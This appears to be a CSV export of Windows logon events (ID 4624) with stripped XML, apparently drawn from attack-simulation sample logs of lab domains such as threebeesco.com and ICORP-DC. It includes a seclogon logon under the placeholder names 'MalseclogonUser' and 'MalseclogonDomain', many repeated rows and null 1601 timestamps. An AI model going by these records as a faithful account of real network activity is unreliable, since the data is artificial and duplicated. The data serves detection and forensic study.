AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982101 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x73b44c + 3 + Kerberos + Kerberos + - + E8C9AC4A-31FC-C37F-B4D7-B3217C608858 + - + - + 0 + 0x0 + - + ::1 + 64849 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982097 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738cf9 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50616 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982092 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738ce4 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50614 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982089 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738afd + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50613 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982084 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + THREEBEESCO.COM + 0x738ae4 + 3 + Kerberos + Kerberos + - + DCED4BA6-CF24-37EF-0627-B0E4EED7F565 + - + - + 0 + 0x0 + - + 172.16.66.19 + 50609 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171296 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aadb8 + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62863 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171295 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aad4a + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62862 + %%1833 + - + 